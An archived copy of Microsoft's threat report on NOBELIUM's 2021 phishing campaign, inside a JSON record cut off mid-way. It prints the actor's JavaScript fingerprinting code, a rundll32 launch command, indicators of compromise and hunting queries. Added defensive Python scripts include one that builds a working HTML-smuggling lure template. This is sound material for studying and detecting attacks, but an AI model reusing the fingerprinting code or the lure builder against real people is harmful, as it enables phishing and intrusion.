{
	"id": "445d7ac5-3291-4b35-b2d1-a9379c7add3d",
	"created_at": "2026-04-06T00:13:29.342779Z",
	"updated_at": "2026-04-10T03:37:32.847452Z",
	"deleted_at": null,
	"sha1_hash": "0ba1f2de8fff45674c76ba94ef6f45916cb02838",
	"title": "New sophisticated email-based attack from NOBELIUM | Microsoft Security Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 325277,
	"plain_text": "New sophisticated email-based attack from NOBELIUM | Microsoft\r\nSecurity Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2021-05-28 · Archived: 2026-04-05 13:25:32 UTC\r\nMicrosoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by\r\nNOBELIUM, the threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP\r\nmalware, GoldMax malware, and other related components. The campaign, initially observed and tracked by Microsoft\r\nsince January 2021, evolved over a series of waves demonstrating significant experimentation. On May 25, 2021, the\r\ncampaign escalated as NOBELIUM leveraged the legitimate mass-mailing service, Constant Contact, to masquerade as a\r\nUS-based development organization and distribute malicious URLs to a wide variety of organizations and industry verticals.\r\nMicrosoft is issuing this alert and new security research regarding this sophisticated email-based campaign that\r\nNOBELIUM has been operating to help the industry understand and protect from this latest activity. Below, we have\r\noutlined attacker motives, malicious behavior, and best practices to protect against this attack. You can also find more\r\ninformation on the Microsoft On The Issues blog.\r\nNote: This is an active incident. We will post more details here as they become available.\r\nUpdate [05/28/2021]: We published a new blog post detailing NOBELIUM’s latest early-stage toolset, composed\r\nof four tools utilized in a unique infection chain: EnvyScout, BoomBox, NativeZone, and VaporRage. \r\nNOBELIUM has historically targeted government organizations, non-government organizations (NGOs), think tanks,\r\nmilitary, IT service providers, health technology and research, and telecommunications providers. 
With this latest attack, NOBELIUM attempted to target approximately 3,000 individual accounts across more than 150 organizations, employing an established pattern of using unique infrastructure and tooling for each target, which increases their ability to remain undetected for a longer period of time.\r\nThis new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that were obscured behind the mailing service’s URL (many email and document services provide link-tracking wrappers that simplify the sharing of files and give the sender insight into who clicked a link and when). Due to the high volume of emails distributed in this campaign, automated email threat detection systems blocked most of the malicious emails and marked them as spam. However, some of the earlier emails may still have reached recipients, either because of configuration and policy settings or because they were sent before detections were in place.\r\nMicrosoft 365 Defender delivers coordinated defense against this threat. Microsoft Defender for Office 365 detects the malicious emails, and Microsoft Defender for Endpoint detects the malware and malicious behaviors. 
Due to the fast-moving nature of this campaign and its perceived scope, Microsoft encourages organizations to investigate and monitor\r\ncommunications matching characteristics described in this report and take the actions described below in this article.\r\nWe continue to see an increase in sophisticated and nation-state-sponsored attacks and, as part of our ongoing threat research\r\nand efforts to protect customers, we will continue to provide guidance to the security community on how to secure against\r\nand respond to these multi-dimensional attacks.\r\nSpear-phishing campaign delivers NOBELIUM payloads\r\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\r\nPage 1 of 10\n\nThe NOBELIUM campaign observed by MSTIC and detailed in this blog differs significantly from the NOBELIUM\r\noperations that ran from September 2019 until January 2021, which included the compromise of the SolarWinds Orion\r\nplatform. It is likely that these observations represent changes in the actor’s tradecraft and possible experimentation\r\nfollowing widespread disclosures of previous incidents. \r\nEarly testing and initial discovery\r\nAs part of the initial discovery of the campaign in February, MSTIC identified a wave of phishing emails that leveraged the\r\nGoogle Firebase platform to stage an ISO file containing malicious content, while also leveraging this platform to record\r\nattributes of those who accessed the URL. MSTIC traced the start of this campaign to January 28, 2021, when the actor was\r\nseemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging Firebase URLs to\r\nrecord targets who clicked. No delivery of a malicious payload was observed during this early activity.\r\nEvolving delivery techniques\r\nIn the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML\r\nfile attached to a spear-phishing email. 
When opened by the targeted user, JavaScript within the HTML wrote an ISO file to disk and encouraged the target to open it, which caused Windows to mount the ISO much like an external or network drive. From there, a shortcut file (LNK) would execute an accompanying DLL, resulting in Cobalt Strike Beacon executing on the system.\r\nFigure 1. Example flow of the HTML/ISO infection chain.\r\nHere’s an example of target fingerprinting code leveraging Firebase (the XMLHttpRequest open() calls, which name the request endpoints, are not reproduced here; comments added):\r\ntry {\r\n// first request: fetch a value from a remote endpoint; its response body is kept in sdfgfghj\r\nlet sdfgfghj = '';\r\nlet kjhyui = new XMLHttpRequest();\r\nkjhyui.onreadystatechange = function (){\r\nsdfgfghj = this.responseText;\r\n}\r\nkjhyui.send(null);\r\n// fingerprint: the browser user agent and the URL path minus its leading slash, used to tell recipients apart\r\nlet ioiolertsfsd = navigator.userAgent;\r\nlet uyio = window.location.pathname.replace('/','');\r\nvar ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj};\r\nctryur = JSON.stringify(ctryur);\r\n// second request: POST the JSON record to the actor’s collection endpoint\r\nlet sdfghfgh = new XMLHttpRequest();\r\nsdfghfgh.setRequestHeader('Content-Type', 'application/json');\r\nsdfghfgh.send(ctryur);\r\n} catch (e) {} // any failure is swallowed so the lure page keeps working\r\nSimilar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several alterations to the accompanying HTML document based on the intended target. MSTIC also observed the actor experimenting with removing the ISO from Firebase and instead encoding it within the HTML document. Similarly, the actor experimented with redirecting the HTML document to an ISO that contained an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within the RTF. In one final example of experimentation, there was no accompanying HTML in the phishing email; instead a URL led to an independent website spoofing the targeted organization, from where the ISO was distributed.\r\nThe phishing message and delivery method were not the only evolving factors in the campaign. 
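The HTML smuggling step described above (JavaScript in the attachment writes an ISO to disk, and in later waves the ISO is encoded inside the HTML itself) is something a mail gateway or sandbox can triage statically. The following Python script is an added example, not code from the original report or from the actor: it looks for long base64 runs in an HTML attachment, decodes them, checks whether any decoded blob carries the ISO 9660 signature, and records which file-writing browser APIs the page uses. The lure page, the ISO bytes and the file name attachment.iso are constructed for the example.

```python
import base64
import re

# ISO 9660 images carry the volume descriptor signature 'CD001' at byte 0x8001
# (the first 32 KiB are the reserved system area).
ISO_SIGNATURE_OFFSET = 0x8001
ISO_SIGNATURE = b'CD001'

# A long base64 run is the usual carrier for a smuggled file; short runs
# (inline icons, tracking pixels) are ignored.
BASE64_RUN = re.compile(r'[A-Za-z0-9+/]{256,}={0,2}')

# Browser APIs a smuggling script needs to turn text back into a file on disk.
SMUGGLING_APIS = ('atob(', 'new Blob(', 'createObjectURL(', 'msSaveOrOpenBlob(', '.download')


def build_fake_iso():
    '''Constructed stand-in for an ISO image: only the signature is real, the rest is padding.'''
    return bytes(ISO_SIGNATURE_OFFSET) + ISO_SIGNATURE + bytes(2048)


def build_sample_lure(iso_bytes, file_name='attachment.iso'):
    '''Constructed HTML lure (hypothetical file name) that decodes the embedded image in the
    browser and triggers a download; it mirrors the technique, not the actor script.'''
    template = '''<html><body><p>Loading document...</p><script>
var payload = atob('{blob}');
var bytes = new Uint8Array(payload.length);
for (var i = 0; i < payload.length; i++) bytes[i] = payload.charCodeAt(i);
var blob = new Blob([bytes], {{type: 'application/octet-stream'}});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = '{name}';
a.click();
</script></body></html>'''
    return template.format(blob=base64.b64encode(iso_bytes).decode('ascii'), name=file_name)


def build_benign_page():
    '''Constructed control case: an inline base64 image but no file-writing script.'''
    return '''<html><body><img src='data:image/png;base64,{blob}'></body></html>'''.format(
        blob=base64.b64encode(bytes(300)).decode('ascii'))


def embedded_payloads(html):
    '''Decode every long base64 run and return a list of (offset, decoded bytes).'''
    found = []
    for match in BASE64_RUN.finditer(html):
        try:
            found.append((match.start(), base64.b64decode(match.group(0), validate=True)))
        except ValueError:
            continue  # a run that is not valid base64 after all
    return found


def is_iso9660(data):
    return data[ISO_SIGNATURE_OFFSET:ISO_SIGNATURE_OFFSET + len(ISO_SIGNATURE)] == ISO_SIGNATURE


def triage_html(html):
    '''Score an HTML attachment: smuggling APIs present, embedded blobs, and whether any blob is an ISO.'''
    apis = [api for api in SMUGGLING_APIS if api in html]
    payloads = embedded_payloads(html)
    iso_count = sum(1 for _, data in payloads if is_iso9660(data))
    return {
        'smuggling_apis': apis,
        'embedded_blobs': len(payloads),
        'iso_payloads': iso_count,
        'largest_blob': max((len(data) for _, data in payloads), default=0),
        # a blob plus the machinery to write it to disk is the smuggling signal;
        # an ISO inside the blob is the exact chain described in this report
        'suspicious': bool(apis) and bool(payloads),
    }


if __name__ == '__main__':
    for label, page in (('lure', build_sample_lure(build_fake_iso())), ('benign', build_benign_page())):
        print(label, triage_html(page))
```

The control case matters: a base64 blob alone is common in legitimate mail (inline images), so the verdict requires both an embedded blob and the script machinery to turn it into a file. A decoded blob with CD001 at offset 0x8001 is the artifact this report describes and is worth detonating or hashing against the indicators given later in the report.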
In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the targeted device was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for CVE-2021-1879 was served.\r\nEscalated targeting and delivery\r\nExperimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the actor abandoned the use of Firebase and no longer tracked users with a dedicated URL. Their techniques shifted to encoding the ISO within the HTML document and having that document report target host details to a remote server, using the api.ipify.org service. The actor sometimes employed checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.\r\nIn May 2021, the actor changed techniques once more: it kept the HTML and ISO combination but dropped a custom .NET first-stage implant, detected as TrojanDownloader:MSIL/BoomBox, that reported host-based reconnaissance data to, and downloaded additional payloads from, the Dropbox cloud storage platform.\r\nOn May 25, the NOBELIUM campaign escalated significantly. Using the legitimate mass mailing service Constant Contact, NOBELIUM attempted to target around 3,000 individual accounts across more than 150 organizations. Because of the campaign’s high volume, automated systems blocked most of the emails and marked them as spam. However, automated systems might have successfully delivered some of the earlier emails to recipients.\r\nIn the May 25 campaign, there were several iterations. 
In one example the emails appear to originate from USAID \u003cashainfo@usaid.gov\u003e while having an authentic sender email address that matches the standard Constant Contact service. This address (which varies for each recipient) ends in @in.constantcontact.com, and a Reply-To address of \u003cmhillary@usaid.gov\u003e was observed. The emails pose as an alert from USAID, as seen below.\r\nFigure 2. Example email screenshot.\r\nIf the user clicked the link in the email, the URL directs them to the legitimate Constant Contact service, which follows this pattern:\r\nhttps://r20.rs6[.]net/tn.jsp?f=\r\nThe user is then redirected to NOBELIUM-controlled infrastructure, with a URL following this pattern:\r\nA malicious ISO file is then delivered to the system. Within this ISO file are the following files, which are saved in the %USER%\\AppData\\Local\\Temp\\\u003crandom folder name\u003e path:\r\nA shortcut, such as Reports.lnk, that executes a custom Cobalt Strike Beacon loader\r\nA decoy document, such as ica-declass.pdf, that is displayed to the target\r\nA DLL, such as Documents.dll, that is a custom Cobalt Strike Beacon loader dubbed NativeZone by Microsoft\r\nFigure 3. ISO file contents. It is worth noting that the “Documents.dll” is a hidden file.\r\nFigure 4. 
Shortcut which executes the hidden DLL file.\r\nThe end result when detonating the LNK file is the execution of “C:\\Windows\\system32\\rundll32.exe Documents.dll,Open”.\r\nThe successful deployment of these payloads enables NOBELIUM to achieve persistent access to compromised systems. Successful execution of these malicious payloads could then enable NOBELIUM to conduct actions on objectives, such as lateral movement, data exfiltration, and delivery of additional malware.\r\nIndicators of compromise (IOCs) for the campaign occurring on May 25 are provided in this blog to help security teams identify actor activity.\r\nMicrosoft security researchers assess that NOBELIUM’s spear-phishing operations are recurring and have increased in frequency and scope. It is anticipated that additional activity may be carried out by the group using an evolving set of tactics.\r\nMicrosoft continues to monitor this threat actor’s evolving activities and will update as necessary. Microsoft 365 Defender protects customers against the multiple components of this threat: malicious emails, file attachments, connections, malware payloads, other malicious artifacts, and attacker behavior. Refer to the detection details below for specific detection names and alerts. Additionally, customers should follow defensive guidance and leverage advanced hunting to help mitigate variants of actor activity.\r\nMitigations\r\nApply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.\r\nTurn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. 
Cloud-based machine learning protections block the large majority of new and unknown variants.\r\nRun EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. (EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.)\r\nEnable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.\r\nEnable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\r\nUse device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\r\nEnable multifactor authentication (MFA) to mitigate compromised credentials. Microsoft strongly encourages all customers to download and use passwordless solutions like Microsoft Authenticator to secure their accounts.\r\nFor Office 365 users, see multifactor authentication support.\r\nFor consumer and personal email accounts, see how to use two-step verification.\r\nTurn on the following attack surface reduction rule to block or audit activity associated with this threat: Block all Office applications from creating child processes. NOTE: Assess rule impact before deployment.\r\nIndicators of compromise (IOC)\r\nThis attack is still active, so these indicators should not be considered exhaustive for this observed activity. 
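Before the indicator list, a check for the LNK stage described in the delivery section above: the shortcut inside the mounted ISO runs rundll32.exe with the hidden DLL and an export name (Documents.dll,Open). The following Python script is an added example, not code from this report or from any Microsoft product: it parses the ShellLinkHeader and StringData sections of a .lnk file as laid out in the MS-SHLLINK format and flags the rundll32 plus unqualified-DLL pattern. The shortcut it parses is built inside the script as a constructed sample, not an actor artifact; its field values mirror the command shown in the delivery section.

```python
import struct

# ShellLinkHeader constants from MS-SHLLINK.
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex('0114020000000000c000000000000046')
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData sections appear in this fixed order, each present only if its flag is set.
STRING_DATA = (
    (HAS_NAME, 'name'),
    (HAS_RELATIVE_PATH, 'relative_path'),
    (HAS_WORKING_DIR, 'working_dir'),
    (HAS_ARGUMENTS, 'arguments'),
    (HAS_ICON_LOCATION, 'icon_location'),
)
BACKSLASH = chr(92)  # Windows path separator
RUNDLL32 = BACKSLASH.join(('C:', 'Windows', 'system32', 'rundll32.exe'))


def parse_lnk(data):
    '''Parse the header and StringData of a .lnk file; the IDList and LinkInfo blocks are skipped.'''
    if (len(data) < HEADER_SIZE or struct.unpack_from('<I', data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError('not a shell link file')
    flags = struct.unpack_from('<I', data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from('<H', data, pos)[0]  # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from('<I', data, pos)[0]      # LinkInfoSize counts itself
    fields = {'flags': flags}
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from('<H', data, pos)[0]     # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode('utf-16-le')
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode('cp1252')
            pos += count
    return fields


def classify_lnk(fields):
    '''Flag the rundll32 <dll>,<export> launch pattern. An unqualified DLL name is resolved
    relative to the working directory, i.e. it is loaded from the mounted image itself.'''
    target = fields.get('relative_path', '').lower()
    args = fields.get('arguments', '').strip()
    dll, comma, export = args.partition(',')
    verdict = {
        'rundll32': target.endswith('rundll32.exe'),
        'dll': dll,
        'export': export.strip(),
        'dll_unqualified': bool(dll) and BACKSLASH not in dll and '/' not in dll and ':' not in dll,
    }
    verdict['suspicious'] = (verdict['rundll32'] and bool(comma)
                             and dll.lower().endswith('.dll') and verdict['dll_unqualified'])
    return verdict


def build_lnk(relative_path, arguments, working_dir='.'):
    '''Build a minimal Unicode .lnk (no IDList, no LinkInfo); a constructed sample, not an actor artifact.'''
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, three FILETIMEs, FileSize,
    # IconIndex, ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1..3
    header = struct.pack('<I16sIIQQQIIIHHII', HEADER_SIZE, LNK_CLSID, flags,
                         0x80, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(text):
        return struct.pack('<H', len(text)) + text.encode('utf-16-le')

    return header + string_data(relative_path) + string_data(working_dir) + string_data(arguments)


if __name__ == '__main__':
    sample = build_lnk(RUNDLL32, 'Documents.dll,Open')
    print(classify_lnk(parse_lnk(sample)))
```

The parser skips the LinkTargetIDList and LinkInfo blocks rather than decoding them; a shortcut whose target is recorded only in the IDList will therefore show no relative_path, and a fuller parser would decode the IDList to recover it. The unqualified-DLL condition is what separates this chain from ordinary rundll32 shortcuts that name a system DLL by full path: a bare Documents.dll is resolved from the working directory, which here is the mounted image.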
These indicators of compromise are from the large-scale campaign launched on May 25, 2021.\r\nINDICATOR | TYPE | DESCRIPTION\r\nashainfo@usaid.gov | Email | Spoofed email account\r\nmhillary@usaid.gov | Email | Spoofed email account\r\n2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252 | SHA-256 | Malicious ISO file (container)\r\nd035d394a82ae1e44b25e273f99eae8e2369da828d6b6fdb95076fd3eb5de142 | SHA-256 | Malicious ISO file (container)\r\n94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916 | SHA-256 | Malicious ISO file (container)\r\n48b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0 | SHA-256 | Malicious shortcut (LNK)\r\nee44c0692fd2ab2f01d17ca4b58ca6c7f79388cbc681f885bb17ec946514088c | SHA-256 | Cobalt Strike Beacon malware\r\nee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330 | SHA-256 | Cobalt Strike Beacon malware\r\nusaid.theyardservice[.]com | Domain | Subdomain used to distribute ISO file\r\nworldhomeoutlet[.]com | Domain | Subdomain in Cobalt Strike C2\r\ndataplane.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2\r\ncdn.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2\r\nstatic.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2\r\n192[.]99[.]221[.]77 | IP address | IP resolved to by worldhomeoutlet[.]com\r\n83[.]171[.]237[.]173 | IP address | IP resolved to by *theyardservice[.]com\r\ntheyardservice[.]com | Domain | Actor controlled domain\r\nDetection details\r\nAntivirus\r\nMicrosoft Defender Antivirus detects threat components as the following malware:\r\nTrojan:Win32/NativeZone.C!dha\r\nEndpoint detection and response (EDR)\r\nAlerts with the following titles in the Security Center can indicate threat activity on your network:\r\nMalicious ISO File used by NOBELIUM\r\nCobalt Strike Beacon used by NOBELIUM\r\nCobalt Strike network infrastructure used by NOBELIUM\r\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\r\nAn uncommon file was created and added to startup folder.\r\nA link file (LNK) with unusual characteristics was opened.\r\nAdvanced hunting\r\nMicrosoft 365 Defender\r\nNOTE: The following sample queries let you search for a week’s worth of events. To explore up to 30 days’ worth of raw data to inspect events in your network and locate potential NOBELIUM mass email-related indicators for more than a week, go to the Advanced Hunting page \u003e Query tab, select the calendar drop-down menu, and update your query to hunt for the Last 30 days.\r\nTo locate possible exploitation activity, run the following query in the Microsoft 365 security center:\r\nNOBELIUM abuse of USAID Constant Contact resources in email data\r\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. Run query in Microsoft 365 security center.\r\nEmailUrlInfo\r\n| where UrlDomain == \"r20.rs6.net\"\r\n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId\r\n| where SenderMailFromDomain == \"in.constantcontact.com\"\r\n| where SenderFromDomain == \"usaid.gov\"\r\nNOBELIUM subject lines used in abuse of Constant Contact service\r\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. 
It also specifies email subject keywords seen in phishing campaigns in late May that use the term “Special Alert!” in various ways in the subject. Run query in Microsoft 365 security center.\r\nlet SubjectTerms = pack_array(\"Special\",\"Alert\");\r\nEmailUrlInfo\r\n| where UrlDomain == \"r20.rs6.net\"\r\n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId\r\n| where SenderMailFromDomain == \"in.constantcontact.com\"\r\n| where SenderFromDomain == \"usaid.gov\"\r\n| where Subject has_any (SubjectTerms)\r\nAzure Sentinel\r\nNOBELIUM exploitation search using Azure Sentinel\r\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.\r\nMITRE ATT\u0026CK techniques observed\r\nThis threat makes use of attacker techniques documented in the MITRE ATT\u0026CK framework.\r\nInitial access\r\nT1566.003 Phishing: Spearphishing via Service—NOBELIUM used the legitimate mass mailing service Constant Contact to send their emails.\r\nT1566.002 Phishing: Spearphishing Link—The emails sent by NOBELIUM include a URL that directs the user to the legitimate Constant Contact service, which redirects to NOBELIUM-controlled infrastructure.\r\nExecution\r\nT1610 Deploy Container—The payload is delivered via an ISO file that is mounted on the target computer.\r\nT1204.001 User Execution: Malicious Link—The Cobalt Strike Beacon payload is executed via a malicious link (LNK) file.\r\nCommand and control\r\nT1071.001 Application Layer Protocol: Web Protocols—Cobalt Strike Beacons call out to attacker infrastructure via port 443.\r\n
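The two Advanced Hunting queries above can be reproduced outside Microsoft 365 Defender against raw messages, for instance in a mail gateway hook or over an exported mailbox. The following Python script is an added example, not part of the original report: it ports the query logic (tracking-link domain r20.rs6.net, envelope sender domain in.constantcontact.com, header From domain usaid.gov, and the has_any subject terms of the second query) using only the standard library. The three messages are constructed samples; the Return-Path header stands in for the SMTP envelope sender that SenderMailFromDomain is derived from, and the f= token values are placeholders.

```python
from email import message_from_string, policy
from email.utils import parseaddr
import re
from urllib.parse import urlparse

# The values the two Advanced Hunting queries pivot on.
TRACKING_DOMAIN = 'r20.rs6.net'                 # EmailUrlInfo.UrlDomain
BULK_SENDER_DOMAIN = 'in.constantcontact.com'   # EmailEvents.SenderMailFromDomain
SPOOFED_FROM_DOMAIN = 'usaid.gov'               # EmailEvents.SenderFromDomain
SUBJECT_TERMS = ('Special', 'Alert')            # let SubjectTerms = pack_array(...)

# Constructed sample messages, not real captures. Return-Path stands in for the
# SMTP envelope sender (assumption); the f= token is a placeholder value.
LURE = '''From: USAID <ashainfo@usaid.gov>
Reply-To: <mhillary@usaid.gov>
Return-Path: <bounces-0001@in.constantcontact.com>
To: analyst@example.org
Subject: USAID Special Alert!
Content-Type: text/plain; charset=us-ascii

Please review the attached documents: https://r20.rs6.net/tn.jsp?f=EXAMPLE-TOKEN
'''

LURE_OTHER_SUBJECT = LURE.replace('Subject: USAID Special Alert!', 'Subject: Meeting notes')

NEWSLETTER = '''From: Acme Updates <news@acme.example>
Return-Path: <bounces-0002@in.constantcontact.com>
To: analyst@example.org
Subject: Special offer this week
Content-Type: text/plain; charset=us-ascii

This week only: https://r20.rs6.net/tn.jsp?f=EXAMPLE-TOKEN-2
'''


def header_domain(msg, name):
    '''Domain part of an address header, lower-cased; empty string if the header is absent.'''
    address = parseaddr(str(msg.get(name, '')))[1]
    return address.rpartition('@')[2].lower()


def url_domains(msg):
    '''Hostnames of every http(s) URL in the preferred body part.'''
    part = msg.get_body(preferencelist=('plain', 'html'))
    text = part.get_content() if part is not None else ''
    domains = set()
    for token in text.split():
        token = token.strip('.,;:!?()<>')
        if token.lower().startswith(('http://', 'https://')):
            host = urlparse(token).hostname
            if host:
                domains.add(host)
    return domains


def subject_tokens(msg):
    # has_any in KQL matches whole terms, so tokenize instead of substring matching
    return set(re.findall('[a-z0-9]+', str(msg.get('Subject', '')).lower()))


def check_message(raw, subject_terms=()):
    '''Port of the two hunting queries: with no subject_terms this is the first query, with
    SUBJECT_TERMS the second. Returns each condition plus the overall verdict.'''
    msg = message_from_string(raw, policy=policy.default)
    result = {
        'tracking_url': TRACKING_DOMAIN in url_domains(msg),
        'bulk_sender': header_domain(msg, 'Return-Path') == BULK_SENDER_DOMAIN,
        'spoofed_from': header_domain(msg, 'From') == SPOOFED_FROM_DOMAIN,
        'reply_to_domain': header_domain(msg, 'Reply-To'),
        'subject_hit': any(term.lower() in subject_tokens(msg) for term in subject_terms),
    }
    result['matched'] = (result['tracking_url'] and result['bulk_sender'] and result['spoofed_from']
                         and (result['subject_hit'] or not subject_terms))
    return result


if __name__ == '__main__':
    for label, raw in (('lure', LURE), ('lure, other subject', LURE_OTHER_SUBJECT), ('newsletter', NEWSLETTER)):
        print(label, check_message(raw, SUBJECT_TERMS))
```

The newsletter sample shows why the query joins three conditions: Constant Contact tracking links and the in.constantcontact.com envelope sender are normal for any bulk mail, and only their combination with a spoofed usaid.gov From domain is the campaign signal. The Reply-To domain is returned rather than matched so an analyst can see the mhillary@usaid.gov pattern without hard-coding a single mailbox.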
Source: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
	],
	"report_names": [
		"new-sophisticated-email-based-attack-from-nobelium"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
